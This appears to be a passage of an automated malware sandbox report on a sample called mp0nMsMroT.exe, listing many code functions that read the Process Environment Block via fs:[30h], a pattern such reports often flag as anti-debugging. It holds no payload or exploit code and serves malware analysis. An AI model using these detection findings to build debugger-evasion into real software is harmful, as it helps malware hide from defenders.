Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h] 1_2_00AD0050
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE61A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE61A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h] 1_2_00B749A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B369A6 mov eax, dword ptr fs:[00000030h] 1_2_00B369A6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA185 mov eax, dword ptr fs:[00000030h] 1_2_00AEA185
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADC182 mov eax, dword ptr fs:[00000030h] 1_2_00ADC182
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2990 mov eax, dword ptr fs:[00000030h] 1_2_00AE2990
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 1_2_00ABB1E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 1_2_00ABB1E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 1_2_00ABB1E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B441E8 mov eax, dword ptr fs:[00000030h] 1_2_00B441E8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 mov ecx, dword ptr fs:[00000030h] 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h] 1_2_00AE513A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h] 1_2_00AE513A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h] 1_2_00AB9100
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h] 1_2_00AB9100
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h] 1_2_00AB9100
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC962 mov eax, dword ptr fs:[00000030h] 1_2_00ABC962
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h] 1_2_00ABB171
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h] 1_2_00ABB171
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h] 1_2_00ADB944
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h] 1_2_00ADB944
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 1_2_00AB52A5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 1_2_00ACAAB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 1_2_00ACAAB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00AEFAB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h] 1_2_00AED294
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h] 1_2_00AED294
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00AE2AE4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2ACB mov eax, dword ptr fs:[00000030h] 1_2_00AE2ACB
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 1_2_00AF4A2C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 1_2_00AF4A2C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B7AA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B7AA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC8A0A mov eax, dword ptr fs:[00000030h] 1_2_00AC8A0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD3A1C mov eax, dword ptr fs:[00000030h] 1_2_00AD3A1C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov ecx, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h] 1_2_00AB5210
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ABAA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ABAA16
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF927A mov eax, dword ptr fs:[00000030h] 1_2_00AF927A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h] 1_2_00B6B260
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h] 1_2_00B6B260
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88A62 mov eax, dword ptr fs:[00000030h] 1_2_00B88A62
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7EA55 mov eax, dword ptr fs:[00000030h] 1_2_00B7EA55
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B44257 mov eax, dword ptr fs:[00000030h] 1_2_00B44257
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h] 1_2_00AB9240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AE4BAD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AE4BAD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AE4BAD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B85BA5 mov eax, dword ptr fs:[00000030h] 1_2_00B85BA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 1_2_00AC1B8F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 1_2_00AC1B8F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6D380 mov ecx, dword ptr fs:[00000030h] 1_2_00B6D380
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2397 mov eax, dword ptr fs:[00000030h] 1_2_00AE2397
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7138A mov eax, dword ptr fs:[00000030h] 1_2_00B7138A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEB390 mov eax, dword ptr fs:[00000030h] 1_2_00AEB390
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADDBE9 mov eax, dword ptr fs:[00000030h] 1_2_00ADDBE9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AE03E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h] 1_2_00B353CA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h] 1_2_00B353CA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7131B mov eax, dword ptr fs:[00000030h] 1_2_00B7131B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABDB60 mov ecx, dword ptr fs:[00000030h] 1_2_00ABDB60
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 1_2_00AE3B7A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 1_2_00AE3B7A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88B58 mov eax, dword ptr fs:[00000030h] 1_2_00B88B58
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABDB40 mov eax, dword ptr fs:[00000030h] 1_2_00ABDB40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABF358 mov eax, dword ptr fs:[00000030h] 1_2_00ABF358
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC849B mov eax, dword ptr fs:[00000030h] 1_2_00AC849B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 1_2_00B36CF0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 1_2_00B36CF0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 1_2_00B36CF0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B714FB mov eax, dword ptr fs:[00000030h] 1_2_00B714FB
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88CD6 mov eax, dword ptr fs:[00000030h] 1_2_00B88CD6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEBC2C mov eax, dword ptr fs:[00000030h] 1_2_00AEBC2C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h] 1_2_00B71C06
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h] 1_2_00B8740D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h] 1_2_00B8740D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h] 1_2_00B8740D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h] 1_2_00B36C0A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD746D mov eax, dword ptr fs:[00000030h] 1_2_00AD746D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h] 1_2_00B4C450
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h] 1_2_00B4C450
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA44B mov eax, dword ptr fs:[00000030h] 1_2_00AEA44B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE35A1 mov eax, dword ptr fs:[00000030h] 1_2_00AE35A1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h] 1_2_00B805AC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h] 1_2_00B805AC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00AE1DB5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00AE1DB5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 1_2_00AE1DB5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 1_2_00AB2D8A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h] 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 1_2_00AEFD9B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 1_2_00AEFD9B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B68DF1 mov eax, dword ptr fs:[00000030h] 1_2_00B68DF1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 1_2_00ACD5E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 1_2_00ACD5E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00B7FDE2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 1_2_00B36DC9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B3A537 mov eax, dword ptr fs:[00000030h] 1_2_00B3A537
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88D34 mov eax, dword ptr fs:[00000030h] 1_2_00B88D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7E539 mov eax, dword ptr fs:[00000030h] 1_2_00B7E539
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 1_2_00AE4D3B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 1_2_00AE4D3B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 1_2_00AE4D3B
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC3D34
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABAD30 mov eax, dword ptr fs:[00000030h] 1_2_00ABAD30
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h] 1_2_00ADC577
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h] 1_2_00ADC577
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF3D43 mov eax, dword ptr fs:[00000030h] 1_2_00AF3D43
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B33540 mov eax, dword ptr fs:[00000030h] 1_2_00B33540
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B63D40 mov eax, dword ptr fs:[00000030h] 1_2_00B63D40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD7D50 mov eax, dword ptr fs:[00000030h] 1_2_00AD7D50
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B346A7 mov eax, dword ptr fs:[00000030h] 1_2_00B346A7
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 1_2_00B80EA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 1_2_00B80EA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 1_2_00B80EA5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4FE87 mov eax, dword ptr fs:[00000030h] 1_2_00B4FE87
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE16E0 mov ecx, dword ptr fs:[00000030h] 1_2_00AE16E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC76E2 mov eax, dword ptr fs:[00000030h] 1_2_00AC76E2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE36CC mov eax, dword ptr fs:[00000030h] 1_2_00AE36CC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF8EC7 mov eax, dword ptr fs:[00000030h] 1_2_00AF8EC7
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B88ED6 mov eax, dword ptr fs:[00000030h] 1_2_00B88ED6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6FEC0 mov eax, dword ptr fs:[00000030h] 1_2_00B6FEC0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B6FE3F mov eax, dword ptr fs:[00000030h] 1_2_00B6FE3F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABE620 mov eax, dword ptr fs:[00000030h] 1_2_00ABE620
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h] 1_2_00ABC600
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h] 1_2_00ABC600
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h] 1_2_00ABC600
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE8E00 mov eax, dword ptr fs:[00000030h] 1_2_00AE8E00
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h] 1_2_00AEA61C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h] 1_2_00AEA61C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71608 mov eax, dword ptr fs:[00000030h] 1_2_00B71608
